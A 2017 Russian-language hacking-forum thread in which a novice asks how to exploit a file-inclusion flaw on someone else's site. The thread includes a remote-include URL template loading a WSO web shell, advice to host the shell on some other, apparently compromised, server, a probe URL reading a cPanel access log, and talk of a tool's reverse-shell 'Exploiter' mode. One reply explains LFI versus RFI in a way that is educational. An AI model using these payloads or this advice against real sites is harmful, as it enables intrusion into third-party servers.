Вопрос по [Possible] Local File Inclusion

Discussion in 'Песочница' started by Sensoft, 9 Nov 2017.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    httр://уязвимый-сайт/?переменная=http://сайт_где_у_нас.шелл/ну_и_сам.шелл
    Если я shell залью на localhost то есть на свой сервер xampp (который стоит на пк)
    httр://уязвимый-сайт/?переменная=http://localhost/WSO.php

    Так подействует или нужен сайт с доменом ?
     
    #1 Sensoft, 9 Nov 2017
    Last edited: 9 Nov 2017
  2. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,116
    Likes Received:
    828
    Reputations:
    231
    на локалхосте не подействует
    найди какой-нибудь левый шелл ненужный и туда залей , оттуда уже дернешь напрямую/ Но это надо чтобы было RFI
     
    _________________________
    #2 grimnir, 9 Nov 2017
    Last edited: 9 Nov 2017
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Ссылку на shell надо ставить за место search так же ? (на скрине показан лог уязвимости)
     
  4. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,116
    Likes Received:
    828
    Reputations:
    231
    на скрине у тебя LFI а не RFI http://insafety.org/lfi.php
    локальный инклуд означает, что есть возможность подключать и исполнять или читать файлы только в пределах уязвимого сервера по относительному пути к файлам (а точнее в пределах заданной в конфиге php open_basedir, ибо она ограничивает доступные интерпретатору каталоги). При удалённом инклуде есть возможность подключать произвольные файлы с других серверов по их URL-адресам. RFI встречается гораздо реже, чем LFI и считается более опасной уязвимостью.
     
    _________________________
  5. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Получается залить или выполнить Shell я не могу
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Эксплоиты или софт есть под эксплуатацию LFI не знаешь ? под win желательно не знаешь ? я один нашёл но он для линукса
     
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Дал ссылку пишет что уязвимый только вот не чем не отличается от других ссылок, в чём прикол ?
    http://www.site.ru/search?q=/usr/local/cpanel/logs/access_log
    И ещё не до конца понимаю что значит
    1) Exploiter
    2) Scanner
    типа 1 это эксплуатация, а 2 это сканер
     
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,116
    Likes Received:
    828
    Reputations:
    231
    Exploiter пробует установить reverse shell
    По поводу линка, высокая вероятность ложного срабатывания, т.к запрос идет поиск search?q= и сканеры очень часто пишут что возможно LFI ,но на деле не так
     
    _________________________
Loading...